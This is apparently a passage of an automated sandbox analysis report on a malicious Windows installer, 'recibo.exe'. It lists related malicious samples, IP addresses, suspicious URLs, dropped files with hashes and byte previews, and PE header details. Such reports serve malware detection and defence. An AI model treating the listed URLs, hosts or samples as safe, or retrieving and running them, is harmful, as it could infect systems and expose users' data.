                                              13:26:37API Interceptor2735x Sleep call for process: CasPol.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              HETZNER-ASDELdbyBADfIR.exeGet hashmaliciousBrowse
                                              • 148.251.234.83
                                              illegalargumentexception_comparison_method_violates_its_general_contra 70051.jsGet hashmaliciousBrowse
                                              • 94.130.24.150
                                              SecuriteInfo.com.W32.AIDetectNet.01.6442.exeGet hashmaliciousBrowse
                                              • 116.202.230.200
                                              kyTwt6MpdH.exeGet hashmaliciousBrowse
                                              • 148.251.234.83
                                              ZmzUNJmCH1.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                              • 5.9.197.244
                                              CWU0uX3bV5Get hashmaliciousBrowse
                                              • 95.217.252.212
                                              http://frameboxxindore.comGet hashmaliciousBrowse
                                              • 46.4.104.244
                                              SecuriteInfo.com.XLM.Trojan.Abracadabra.8.Gen.19319.xlsGet hashmaliciousBrowse
                                              • 95.217.145.167
                                              Kn7vI9IYMc3QOV4.exeGet hashmaliciousBrowse
                                              • 78.46.144.83
                                              N2ggWMNLYe.exeGet hashmaliciousBrowse
                                              • 94.130.174.62
                                              zjvhG6HAq4Get hashmaliciousBrowse
                                              • 94.130.241.82
                                              341HRlT4n3Get hashmaliciousBrowse
                                              • 95.217.66.135
                                              Setup.exeGet hashmaliciousBrowse
                                              • 95.217.225.59
                                              FORTNITEA.exeGet hashmaliciousBrowse
                                              • 176.9.247.226
                                              ADOBE PHOTOSHOP.exeGet hashmaliciousBrowse
                                              • 159.69.101.96
                                              omiZor5tdGGet hashmaliciousBrowse
                                              • 88.198.32.239
                                              JodU9EYJHc.exeGet hashmaliciousBrowse
                                              • 159.69.101.96
                                              J1Bfl3zuTo.exeGet hashmaliciousBrowse
                                              • 159.69.101.96
                                              Mvh0oMXO11.exeGet hashmaliciousBrowse
                                              • 159.69.101.96

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37f463bf4616ecd445d4a1937da06e19http://a.top4top.ioGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              https://oscarwilliams.net/re/1665.phpGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              TT COPY Euro 57,890_CI0099484_pdf.vbsGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              SecuriteInfo.com.W32.AIDetect.malware2.5627.exeGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              SecuriteInfo.com.Variant.FakeAlert.2.24488.exeGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              LdbyBADfIR.exeGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              https://express.adobe.com/page/vCTYm3h0r9BmZ/Get hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              SecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              http://akrurl.com/.2zpesGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              TAX DOCUMENT.ppamGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              https://www.paymentsjournal.com/analysts-coverage/Get hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              Chrome.Quick.Update.ver.102.41.49568.jsGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              Chrome.Quick.Update.ver.102.41.49568.jsGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              https://servermail.nicepage.io/Home.htmlGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              https://www.evernote.com/shard/s670/sh/55910dd8-9887-4018-3dce-75c372206cc5/1536ce86c6cb14e023f30a8fc3201040Get hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              kyTwt6MpdH.exeGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              https://www.extcovdoc125.org/Get hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              https://bacguidelines.com/Get hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65
                                              https://urlsand.esvalabs.com/?u=https%3A%2F%2Fexpress.adobe.com%2Fpage%2FfeoM5782aYABf%2F&e=d02f10fa&h=34edaf6a&f=y&p=yGet hashmaliciousBrowse
                                              • 172.217.16.142
                                              • 142.250.185.65

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exerecibo.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Trojan.Siggen17.57062.9420.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Trojan.Siggen17.57062.9420.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exeGet hashmaliciousBrowse
                                                      cinchonate.exeGet hashmaliciousBrowse
                                                        cinchonate.exeGet hashmaliciousBrowse
                                                          DHL RECEIPT AWB2036472836.xlsxGet hashmaliciousBrowse
                                                            72rPHMzujO.exeGet hashmaliciousBrowse
                                                              mic(1).exeGet hashmaliciousBrowse
                                                                72rPHMzujO.exeGet hashmaliciousBrowse
                                                                  mic(1).exeGet hashmaliciousBrowse
                                                                    SWIFT.xlsxGet hashmaliciousBrowse
                                                                      bena.exeGet hashmaliciousBrowse
                                                                        payment_34662.exeGet hashmaliciousBrowse
                                                                          bena.exeGet hashmaliciousBrowse
                                                                            payment_34662.exeGet hashmaliciousBrowse
                                                                              PO DP526-025840 & PO DP526-025841.xlsxGet hashmaliciousBrowse

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Temp\Adventure_19.bmp

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                Category:dropped
                                                                                Size (bytes):10521
                                                                                Entropy (8bit):7.888779038440803
                                                                                Encrypted:false
                                                                                SSDEEP:192:oXRZxdt62XpqRigPYtY0CfKTQlh5NKW6F5oJxfskCjGmXa6Pbpwr4WmKM:KRfdt62X+XoElh/KW6ifskEGeaIpwr4n
                                                                                MD5:8D61CCB44C962D7831FB6703B4AF623D
                                                                                SHA1:2BFDC667151057B3A42CDD22F9EB0E5AB0B0EF3C
                                                                                SHA-256:1EFFB5A4A46B05C024518546D4C8BBB45AD3496590E3E86AF533CF31C61512F4
                                                                                SHA-512:FE0C304F73713552ACA3A28D9CCD6BD2C53A45F72052892CC8F94D835A213F2F3C4D8D1656BD8160AE874A63FACC6B79BA763D4A724281E5F0DEDAC87F86375E
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(..9...k....X.....&.2.Z.......k~I.....e...J...}..<..M..8..........".../...O.u...........5.h...71]ZZ......v..Yc...<.i'..m2_..>..#...K...,.qq.^<2|D.V...j..ae.0Mu.^K..#k..3<."FV$HV.)..vmG..H........z.\..#......3_..Wo.g.>.o..........|...V.}.Ho.]...q#..W667Z`..)..l._E'.....+\.w..K....O.o..5......4O..~.

                                                                                C:\Users\user\AppData\Local\Temp\FLADBARMEDES.tub

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):95635
                                                                                Entropy (8bit):6.715584422233703
                                                                                Encrypted:false
                                                                                SSDEEP:768:9hlBFBNMGjjT0QwOqKvIRnCkPFG4ouc83ArsfQFaFL03ZLoeZ4YgXplXpyfHqvds:91XNMjjEqnIfsVFIhBQlYG22vAlGI
                                                                                MD5:0DBDB94BF9F058978C90852607F98DBD
                                                                                SHA1:DCA1907D14891499D855DEB23BF461799C7ED0C4
                                                                                SHA-256:11D6302EBD701AD527EC6358E33FC578AE0D88AC9A43AC03F4AD5276B186538E
                                                                                SHA-512:0D6C48216172958EFE0E305B81D8B0B5C3606F001969E80220D4EBCF818013416992BC8D0638F4B0F6E337040CCABD607731F1912BA9DCFAA2E69C824CFC2877
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:.i.....f....q._f....5j..k.................................................<.f...........).Tsc.......................................{Z&n..f.v........!`..}.............................f...Of.....f.......f.v..([...llllllllllllllllllllllllllllllllllll.........f....c..3B..!................................................!,O....n...f...f.e..0...@.....................................................g.......).D.>)))))))))))))))))))))))))))))))))))))...........f.....w?..PPPPPPPPPPPPPPPPPPPPPPPPP......t.........0...e.................................................f.e../..~6.............................................T7.z.......................................f.....f.i.f.t.f......-.j1.33333333333333333333333333333333333333333f..f.....f.q....................................................f.......w.....f....5.G.[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[...f.g.f.q.f.........$.pS.OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOf............f.q. .*..,...................................................

                                                                                C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):58368
                                                                                Entropy (8bit):5.856484138583398
                                                                                Encrypted:false
                                                                                SSDEEP:768:t2y20tpnvfSd9bbM9tmRtTkwv9QMdVk1QKVnjphRJy26xG0XFC19Io:J20t1SdN0kvZ9pdW1QKVjzy26opD
                                                                                MD5:D600D4F40A2BE641991044EE0814BFA4
                                                                                SHA1:3BDEF3488C28D43D285C47F46B82B980A8F41CD8
                                                                                SHA-256:B0D12A7AADF51B02D52E9E88295E6E6606F68C1508C8D9323B6549AA20EC82AA
                                                                                SHA-512:27B125260AA56FCAD4153A3259ECFB898681C9B096A4A37EB32AC3B722599EA4BFB5BF00F0247136F11F73F280B85844B37F6236331A0EF3B90ED2EC70CEDA55
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: recibo.exe, Detection: malicious, Browse
                                                                                • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                                • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                                • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe, Detection: malicious, Browse
                                                                                • Filename: cinchonate.exe, Detection: malicious, Browse
                                                                                • Filename: cinchonate.exe, Detection: malicious, Browse
                                                                                • Filename: DHL RECEIPT AWB2036472836.xlsx, Detection: malicious, Browse
                                                                                • Filename: 72rPHMzujO.exe, Detection: malicious, Browse
                                                                                • Filename: mic(1).exe, Detection: malicious, Browse
                                                                                • Filename: 72rPHMzujO.exe, Detection: malicious, Browse
                                                                                • Filename: mic(1).exe, Detection: malicious, Browse
                                                                                • Filename: SWIFT.xlsx, Detection: malicious, Browse
                                                                                • Filename: bena.exe, Detection: malicious, Browse
                                                                                • Filename: payment_34662.exe, Detection: malicious, Browse
                                                                                • Filename: bena.exe, Detection: malicious, Browse
                                                                                • Filename: payment_34662.exe, Detection: malicious, Browse
                                                                                • Filename: PO DP526-025840 & PO DP526-025841.xlsx, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Kc..........."...0.................. .....@..... ....................... ............`...@......@............... ..................................................................8............................................................ ..H............text........ ...................... ..`.rsrc...............................@..@........................................H........W..4...........................................................N.((.....tS...}....*F.{....o....s....*F.{....o....s....*.0...........{....o.....s.......&.....*.................J.{....o.....s....*..((...*~.().....tV...}......s....}....*2.{....o....*2.{....o....*F.{....o....s....*2.{....o....*2.{....o....*F.{....o....,..*.*2.{....o....*2.{....o....*2.{....o....*2.{....o....*2.{....o....*:.s....%.}y...*..(....*:.().....}....*..(*....,...}....+.r...ps+...z.....s4...}....*.0......

                                                                                C:\Users\user\AppData\Local\Temp\Rekorddage.Res7

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):37188
                                                                                Entropy (8bit):3.999253187571331
                                                                                Encrypted:false
                                                                                SSDEEP:768:cqLtUhAIasZdPK3ukVO7103q1LjVG0I6Z93rWa1FLXSBhuj3KmuzoAgZ:coUvbkVORtVjVG0I6rbWa1FzSBh0Go9Z
                                                                                MD5:6001AAC06A6EB2B760F3DC4BE1B2D3F8
                                                                                SHA1:A88A72756DB347DE9507495A9F6D5E521EB5FB42
                                                                                SHA-256:0E1AB3CD23AE04019CAEBE185924D859E7017E933F824B1CBEB50FAD08B0CC76
                                                                                SHA-512:B400F2609A8E67BD53062E73FE8A0BD3960CD62A0D388F228C1DE4A01627C4A07F42961161CC2195DEA6961BBC43FF25E6E0E67963A55FEA31B42050F3C68424
                                                                                Malicious:false
                                                                                Preview:65FF458D7673B103962E00EB3124B20464827DB078E548E8A294899303A2D4B26244CDE2525A3176A4E8EBA229CBF8215F529302F79215A66E2485619280B9F07D0F5D7F34853DD732803E9230FA52E1368AFF3ADB4D69A11E23189F458C5DB8C643DA0D9C2FBB18945457C8F6C9CE23E60636F70ED55FAA0F0C6C12C79B7EC3AAEA70A1DA1D0A6F4F5FE558AB0E2C6E1C29796F8931D2F8D428465CA7B637D8F02AE89A7AC93A554AB4667C122E746A0090527C71C6DE714F7C92C3B3C6C3970A6DF5E1810DD362093C012F8F022960DE89C2174441BB0FCDF3214938109206CFA36DEF03346BD5D65E022846E74B01DC01A4AFA966C7D6FE4E9EAA973F402B465DE3D3D7D5424D98589A10A91BEDF63045FF792C2DF90C9B9AFEC37C0771B9771106EF952D5D913FD36B6538078F86A1E71008D07CDA61CB102D1679ED96F46C7C5F5C7AEC4E409B023EAC095B78197F5C16F47795D7253A585A700005C1FBF8C869BD318613FB508D946B75C70E99290F433B81CDFD660CEB126BC9EECFF96DE3B07B3E652ABD795716A914383F7009FF2440C2E1640CB16C11292430FF09E9077E6FCD41DA51CCF89AC2E3C46AD8DB2EF7B13C1DFD1115D44D55B201C10395327AF3A23C988789BFB543EB8635EF4F041E3EA55BE51BDFD81F99B56BF0010BDF14B112E35982A7579BE396E235B34EFA0C08

                                                                                C:\Users\user\AppData\Local\Temp\emoji-body-symbolic.symbolic.png

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):193
                                                                                Entropy (8bit):6.41289035005742
                                                                                Encrypted:false
                                                                                SSDEEP:6:6v/lhPys693pMeNKrccoz4OtOOFImbTM0t7zlyH//jp:6v/7adpfNWcVkqfTMyUf1
                                                                                MD5:F492568998D5783731D50D7CA73AC7A3
                                                                                SHA1:E87B96367BDB02176067336A1CCE3B32EBDCB3B2
                                                                                SHA-256:7A08D7B1CC724A453A0C3EB2F36369D7FD6AC6BD965CE0B4D075D570ED369A9B
                                                                                SHA-512:2C6C726426EA6DD4C7CCC141152E24DD46BDB11D3DB45ED7BA6EAC06DE922F69E5172D5431D63B9ACF96E54B89857317CA0F87880F7B03C43AF9F7416EE95C73
                                                                                Malicious:false
                                                                                Preview:.PNG........IHDR................a....sBIT....|.d....xIDAT8.....0.E..#d.{Gp.k.q.WP....,m..$.BH....s...A<...9..L..Fp.E..7......`......6.n....]b.5...P.....r.W..#....U_....p.P.>.&.1.....IEND.B`.

                                                                                C:\Users\user\AppData\Local\Temp\iso_639-3.xml

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1063988
                                                                                Entropy (8bit):4.881622518734141
                                                                                Encrypted:false
                                                                                SSDEEP:6144:z6ZdTZZl/WX4fVLcf9MvAadpxr5+ZiVHPZ6TZXjcePr:z6nTZZl/WX4fVLcqvV5+ZiX6TZXJ
                                                                                MD5:DCAD3B0F729144CE9EE9A6006D9C3E74
                                                                                SHA1:3EEF5F61BEF834B7089A87423D128990A1065E81
                                                                                SHA-256:D8AB9C2641481645A8ACF875FFA3E3CB271D2CD946691DD8E0BD48513FFF1370
                                                                                SHA-512:BB0ED1F9FBB122728776731B04C54C8FBA57BF2987D04DAD1167FC879FC8A2483093E1A8304A021D6238B408FED826E902386D7DB52B7988CE9DCC89ACB64611
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" ?>.... ....WARNING: THIS FILE IS DEPRECATED.....PLEASE USE THE JSON DATA INSTEAD.....Usually, this data can be found in /usr/share/iso-codes/json.....This file gives a list of all languages in the ISO 639-3..standard, and is used to provide translations via gettext....Copyright . 2005 Alastair McKinstry <mckinstry@computer.org>..Copyright . 2008,2012,2013 Tobias Quathamer <toddy@debian.org>.... This file is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This file is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.. Lesser General Public License for more details..... You should have received a co

                                                                                C:\Users\user\AppData\Local\Temp\lgpllibs.dll

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):37816
                                                                                Entropy (8bit):6.374742588554942
                                                                                Encrypted:false
                                                                                SSDEEP:384:VbijnYW+DZZMwrusWsWQfRl30fP5/A5KFUkYvntA/QcP+ACxw/3MvDG/GhUVgt:dijnQDnzruRNQfv0fP5/oABCDGehHt
                                                                                MD5:9B623087B905D8FE157BDB7EC85009A8
                                                                                SHA1:4B6DD4C0292558513A840B40A991533735D55E02
                                                                                SHA-256:7FA4C9EA4BE0088D6D311BD93FA65BAF8828DA32A2FD4BF8CE0EADE552D46246
                                                                                SHA-512:8C06714F93EB05FAD19F1A96C0DB8FF030B1CD3C03D6B17C231CDE5BCE8DD8358014D87A74306C3BABEF7C573D4AF5AE80904AFBB0329D2D83FE3758EF020719
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..b.........." .....F...*......P.....................................................`A........................................@g.......n..x....................t..............Te...............................`...............o..X............................text...FE.......F.................. ..`.rdata..p....`.......J..............@..@.data...@............d..............@....pdata...............f..............@..@.00cfg...............l..............@..@.rsrc................n..............@..@.reloc...............r..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\microphone-disabled-symbolic.svg

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                Category:dropped
                                                                                Size (bytes):1401
                                                                                Entropy (8bit):5.11645334711433
                                                                                Encrypted:false
                                                                                SSDEEP:24:t4Cjlza3LWdwpQiL6Rch3jV81hF3Q59UPFkyKbRAecFhBrN3AGMH:1cL8w6iJjV8jF3894kNtAecFZTMH
                                                                                MD5:BAE5EB7B918D568E955B8885EEB5DB5A
                                                                                SHA1:FC4421C6A019D0147A13B08CBB2F0720F49E17C3
                                                                                SHA-256:273F11F9F8BD84F2A32E0CC857E21050A9A9C7713F33D9A220991DC232C470BA
                                                                                SHA-512:8A6AE1E26C9451A241655242D16368D87E23036D03D61FF75F5669D5E2930446D6003D5191622F576060E529EE21DD6E28D3408D28719A4D53BD291E673037B0
                                                                                Malicious:false
                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <g fill="#2e3436">. <path d="m 213.531,228.469 -1.061,1.061 14,14 1.062,-1.062 z" transform="translate(-212 -228)"/>. <path d="m 220,228 c -1.662,0 -3,1.338 -3,3 v 1.64453 l 5.2832,5.2832 C 222.72383,237.4058 223,236.73965 223,236 v -5 c 0,-1.662 -1.338,-3 -3,-3 z m -6,6 v 2.00977 c 0,2.96574 2.16538,5.4238 5,5.90039 V 244 h 2 v -2.08984 c 0.64598,-0.10861 1.24984,-0.33194 1.80859,-0.62891 l -1.11132,-1.11133 C 221.17391,240.38 220.60353,240.5 220,240.5 c -2.50669,0 -4.5,-1.99014 -4.5,-4.49023 V 234 Z m 10.5,0 v 2.00977 c 0,1.15729 -0.44099,2.19439 -1.14844,2.98632 l 1.05274,1.05274 C 225.38802,238.9836 226,237.57264 226,236.00977 V 234 Z m -7.5,1.47266 V 236 c 0,1.662 1.338,3 3,3 0.16422,0 0.3216,-0.0237 0.47852,-0.0488 z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-se

                                                                                C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):12288
                                                                                Entropy (8bit):5.814115788739565
                                                                                Encrypted:false
                                                                                SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\printer-symbolic.svg

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                Category:dropped
                                                                                Size (bytes):213
                                                                                Entropy (8bit):4.950492507724413
                                                                                Encrypted:false
                                                                                SSDEEP:6:tI9mc4slzcpG+xW6UmUuksJtjdU0t/ZME:t4Cp9xW6zUmjW0tOE
                                                                                MD5:A4ACDD85E11EA101F3BB4B5BEC3382F0
                                                                                SHA1:2DC81694D5D3C403BF696B1796385D2F64C40D77
                                                                                SHA-256:AD87999B06B9C8035CCAC8EF29D54C9E00055EE9E2DBDD9B7BA24CCF56C471E6
                                                                                SHA-512:6C7C1E913CBF7CD6B91721BD60705B3A87C398B5D69D1FA03D67EDF7C69E23AB410938EC5E0770584E5B6E218443E53A702BD389C2253F05C2D4F48B944D481E
                                                                                Malicious:false
                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M2 4c-.5 0-1 .5-1 1v4c0 .5.5 1 1 1h1V8h10v2h1c.5 0 1-.5 1-1V5c0-.5-.5-1-1-1zm2-3v2h8V1z"/><path d="M4 9v5h8V9z"/></g></svg>

                                                                                C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):288328
                                                                                Entropy (8bit):6.5244639850667605
                                                                                Encrypted:false
                                                                                SSDEEP:6144:TWMbKY5G780mQB8fkrOX9rn8ndvcA5abagLgandSUbJ:aMbKY5AIvfkSX9rSdkfbanUbJ
                                                                                MD5:9ECB2FA510DCDF4BFB06DC80A83294BD
                                                                                SHA1:65E0CEC428D010B94D81BA784EA709EBA598A1CD
                                                                                SHA-256:865868E3BE461332134EFBBA9F1D8AAA5E29A0C8AD3F5A2AC47311F47D4CFD62
                                                                                SHA-512:6F70D42EE2A6CA1F2D85A84947B74EAD03FA4CD00AE5D897FC80832111D88B0D9EEFE81B5FFBC229AE9E1D97467713AF0D385C8C2E96D67B5E9008033C02CB28
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......[...............................s.....s.....s..........M...........z.....z.......................G.........Rich..................PE..d......`.........." .........j......................................................N.....`A.........................................................p..........x!......Hb..............8..............................8...................4...@....................text.............................. ..`.rdata..............................@..@.data...0#..........................@....pdata..x!......."..................@..@.didat..`....@......................@....gehcont$....P......................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..............................@..B........................................................................

                                                                                \Device\ConDrv

                                                                                Download File
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):30
                                                                                Entropy (8bit):3.964735178725505
                                                                                Encrypted:false
                                                                                SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                MD5:9F754B47B351EF0FC32527B541420595
                                                                                SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                Malicious:false
                                                                                Preview:NordVPN directory not found!..

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                Entropy (8bit):7.397735144960236
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:recibo.exe
                                                                                File size:606778
                                                                                MD5:4680729edca682d1b6de8cf875bbfdf5
                                                                                SHA1:debf5126050330ecbfc29582d979101cd557dd42
                                                                                SHA256:e18032a74c8138c907ab2b6937ce66a4483a85e89b05a25153499efee4e85898
                                                                                SHA512:d1eaca1d1513ea5732f05dff1ad527aa48fbdab35386f73bb08a1e5d85569dd80a84217d78ca55a68688deb82a556f5338f45bccbfa16007014d6df2674624d9
                                                                                SSDEEP:12288:5bspFskmgHwg9jXbgO1xzSs9IKTQWfsmuYUD:5bsLskmZc0k9IKTQWkmuZD
                                                                                TLSH:4FD4F154BAC8ECABD01691785476AF656AD3EE1218358903173E3E2FF772193343B81E
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                                                                                File Icon

                                                                                Icon Hash:38e6d3b1b3a2cc71

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x40352d
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

